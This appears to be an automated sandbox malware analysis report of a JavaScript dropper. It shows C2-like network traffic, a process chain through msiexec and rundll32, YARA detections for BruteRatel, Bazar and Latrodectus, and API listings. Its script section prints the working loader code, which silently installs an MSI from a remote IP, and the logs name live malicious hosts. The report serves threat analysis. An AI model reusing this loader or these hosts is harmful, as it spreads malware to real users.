                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    28192.168.2.55002480.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.698581934 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    29192.168.2.55002680.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.424710989 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    30192.168.2.55002780.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.062750101 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    31192.168.2.55002980.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.726120949 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    32192.168.2.55003080.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728039026 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728935957 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    33192.168.2.55003280.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.428221941 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    34192.168.2.55003380.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:27.063258886 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    35192.168.2.55003680.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:33.963417053 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    36192.168.2.55003780.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:34.617934942 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    37192.168.2.55003980.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:40.425404072 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    38192.168.2.55004080.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:41.075792074 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50042 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:43:45.837219000 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 50043 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:43:46.490183115 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 50052 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:44:10.707431078 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 50048 | 188.114.96.3 | 443 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:44:05 UTC | 418 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: isomicrotich.com
Content-Length: 92
Cache-Control: no-cache
2024-10-03 18:44:05 UTC | 92 | OUT | Data Raw: 31 51 44 56 39 33 6c 49 59 36 59 33 35 2f 69 57 77 44 6f 54 6c 4b 44 73 77 71 43 47 67 6a 4e 79 5a 51 78 76 35 61 52 59 74 4d 4e 45 34 73 65 48 50 58 4a 5a 70 54 7a 75 49 78 70 6f 48 76 7a 37 56 5a 4b 6d 4e 44 79 65 41 6a 70 44 4c 30 49 47 51 4a 7a 4e 57 52 56 48 7a 56 45 3d
Data Ascii: 1QDV93lIY6Y35/iWwDoTlKDswqCGgjNyZQxv5aRYtMNE4seHPXJZpTzuIxpoHvz7VZKmNDyeAjpDL0IGQJzNWRVHzVE=
2024-10-03 18:44:06 UTC | 544 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 18:44:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fE0s8DfJbSxGh2F%2FN5y3tg1cRzEhPtAqwXoFzShLKglxKYTo7YicyqsO%2F2QttoBwBiqEtfL7ckoINTyXGP%2B8ZK6X3oyVBPbmqfwQRCMr83GEgZ24d1VX8uXcQeMDpegs%2BjuO"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ccf14e318e87298-EWR
2024-10-03 18:44:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 50050 | 188.114.96.3 | 443 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:44:08 UTC | 417 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: kALB+jBIcqFg9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: isomicrotich.com
Content-Length: 0
Cache-Control: no-cache
2024-10-03 18:44:08 UTC | 569 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 18:44:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HlJg4bduKuuS3zrJh3Yz%2B6YBh%2FICwNvLaqWij3qYE%2BNsfMBV2eGfN%2Fkw7R90o1rtpqLDwGuLejZFUgnFpljHtiFd9CUuFKRGecgLmA5qdJK9%2B8naX0fxhxa42i9TBByPZl1o"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ccf14f12ad21861-EWR
2024-10-03 18:44:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 50051 | 188.114.96.3 | 443 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:44:09 UTC | 417 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: kALB+jBIcqFj9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: isomicrotich.com
Content-Length: 0
Cache-Control: no-cache
2024-10-03 18:44:10 UTC | 540 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 18:44:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9RB9XhtBjDIMJyH8PUbgfSc6SKTnQLRWNSuIXZKc3kjaEYW9ZxVs7slnZDUfBv4IbD6mfSfObKsOufFoPj1nxDeE%2FTrhmfbukYCzRpU9bcU%2Bha5T4Jo9KIvgVN57QAOl6xi0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ccf14f8ca39430e-EWR
2024-10-03 18:44:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 50053 | 188.114.96.3 | 443 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:44:14 UTC | 417 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: kALB+jBIcqFi9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: isomicrotich.com
Content-Length: 0
Cache-Control: no-cache
2024-10-03 18:44:14 UTC | 542 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 18:44:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0aGxZ66p9YHBzrHIKvxQf2ShmeJDC2ll7AD82wFIoS33oK8qMt2gKjNac2GiQcCvevIUPaCrcE850e%2B62u5j%2BeG6WK55tN3qyjfiW4KyA8NLypSka4%2Blee9glSWtAnVC0b6N"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ccf15165f9142c1-EWR
2024-10-03 18:44:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:14:41:59
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js"
                                                                                                                                                                                                                                                    Imagebase:0x7ff695ec0000
                                                                                                                                                                                                                                                    File size:170'496 bytes
                                                                                                                                                                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                                    Start time:14:42:00
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                    Imagebase:0x7ff761510000
                                                                                                                                                                                                                                                    File size:69'632 bytes
                                                                                                                                                                                                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                    Start time:14:42:02
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 3D862CBB7D25098EF2F446AEAACF52B4
                                                                                                                                                                                                                                                    Imagebase:0xfb0000
                                                                                                                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                    Start time:14:42:03
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\Installer\MSIF29D.tmp
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                    Imagebase:0xfb0000
                                                                                                                                                                                                                                                    File size:399'328 bytes
                                                                                                                                                                                                                                                    MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                    Start time:14:42:03
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                    Imagebase:0x8c0000
                                                                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                    Start time:14:42:03
                                                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                                                                                                                                                                                                                                                    Imagebase:0x7ff7a4580000
                                                                                                                                                                                                                                                    File size:71'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_BruteRatel_2, Description: Yara detected BruteRatel, Source: 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:8
Start time:14:42:41
Start date:03/10/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Imagebase:0x7ff674740000
File size:5'141'208 bytes
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:false

Call Graph

[Call graph figure; legend: Executed, Not Executed; entry: C0]

Script:

Code
var activex = "ActiveXObject";
var method = "InstallProduct";
var d = "WindowsInstaller.Installer";
var a = "http://188.119.112.7/das.msi";
var j = "UILevel";
var f = 2;
var obj = new this[activex] ( d );
obj[j] = f;
obj[method] ( a );
• InstallProduct("http://188.119.112.7/das.msi") ➔ undefined

Execution Graph

Execution Coverage:1.4%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:31.1%
Total number of Nodes:322
Total number of Limit Nodes:7

Control-flow Graph

[Control-flow graph figure; legend: Executed, Not Executed]
APIs
• GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00FB549C
• GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00FB551D
• ShellExecuteExW.SHELL32(?), ref: 00FB5601
• ShellExecuteExW.SHELL32(?), ref: 00FB5637
• GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00FB567C
• GetProcAddress.KERNEL32(00000000), ref: 00FB5685
• GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 00FB5688
• AllowSetForegroundWindow.USER32(00000000), ref: 00FB568B
• GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00FB56AB
• GetProcAddress.KERNEL32(00000000), ref: 00FB56AE
• GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 00FB56B5
• Sleep.KERNELBASE(00000064,?,?,?,?,?,?), ref: 00FB56CA
• EnumWindows.USER32(00FB5830,?), ref: 00FB56DF
• BringWindowToTop.USER32(00000000), ref: 00FB56F4
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00FB5711
• GetExitCodeProcess.KERNEL32(?,?), ref: 00FB571B
Strings
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ProcessWindow$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectSingleSleepWait
                                                                                                                                                                                                                                                                      • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                                                                                                                                                                                      • API String ID: 2597324065-2796270252

APIs
• GetCurrentProcess.KERNEL32 ref: 00FB6AC8
• OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00FB6AD5
• CloseHandle.KERNEL32(00000000), ref: 00FB6AF5
Strings
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: Process$CloseCurrentHandleOpenToken
• String ID: S-1-5-18
• API String ID: 4052875653-4289277601

APIs
• GetCurrentProcess.KERNEL32(00000008,?,8F6E4A30,?,-00000010), ref: 00FB57D0
• OpenProcessToken.ADVAPI32(00000000), ref: 00FB57D7
• GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00FB580C
• CloseHandle.KERNEL32(?), ref: 00FB5822
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0

APIs
• GetCommandLineW.KERNEL32(8F6E4A30,?,?,?,?,?,?,?,?,?,00FF56D5,000000FF), ref: 00FBCDE8
  • Part of subcall function 00FB1F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,00FB4251,8F6E4A30,00000000,?,00000000,?,?,?,00FF4400,000000FF,?), ref: 00FB1F9D
• ExitProcess.KERNEL32 ref: 00FBCEB1
  • Part of subcall function 00FB6600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00FB667E
Strings
Memory Dump Source
